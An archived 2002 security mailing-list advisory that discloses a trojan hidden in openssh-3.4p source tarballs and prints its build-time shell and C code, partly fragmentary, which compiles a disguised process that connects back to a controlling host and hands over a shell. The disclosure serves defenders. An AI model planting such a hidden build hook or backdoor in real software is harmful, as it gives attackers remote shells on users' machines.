Trojan located in latest openssh tar files

From: Artur Lindgren (bondat_private)
Date: Thu Aug 01 2002 - 04:59:06 PDT

  • Next message: H C: "Re: Rating Attackers"

    I noticed that openssh-3.4p has a trojan horse (available from 
    and some of the mirrors.
    ( )
    After compiling the file bf-test.c you will notice that it does following:
    # testing in raw ecb mode
    cat >conftest.c <<_ACEOF
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <unistd.h>
    #include <errno.h>
    #include <signal.h>
    #include <setjmp.h>
    jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig
    (int sig){close(s);sleep(3600);longjmp(env,0);
    }int main(){int x;char c,*a[2];struct sockaddr_in
    sa;struct sigaction act;switch(fork()){case
    (struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1)
    else if(x==1){switch(c){case 'A':exit(0);case
    case 'M':alarm(0);sig(0);break;default:}}else{exit
    (grep -v -i bf-test > m.out ; cp m.out ; rm -f m.out
    grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out
    rm -f bf-test*
    TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`"
    if  ! test $TESTPROG ; then TESTPROG=sh; fi
    gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
    if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
    gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
    if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
    cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
    if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
    cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
    rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1
    It runs once, upon compilation of openssh, and is named sh or the 
    compiling users default shell in the processlist in the process 
    This trojan attempts to connect to (hacked machine 
    which has been secured now),
    and awaits one of three characters as the command;
    D execs /bin/sh
    M respawns
    A kills the deamon
    The /bin/sh executed via the D command was controlled by the daemon 
    listening on, potentially meaning that
    people affected by this has given a shell, possibly root, to user unknown.
    <Hans> "Let this be a lesson. Don't use root unless you REALLY have to."
    Artur Lindgren, Comitnet AB
    Special thanks to
    (Ratler, Mrsaint, Jordan, Drabant, Hans and all of you ISP people in sweden :D)
    Thanks to ^Sarge^ for quickly taking care of the hacked machine this 
    trojan connected to.
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:

    This archive was generated by hypermail 2b30 : Thu Aug 01 2002 - 08:28:35 PDT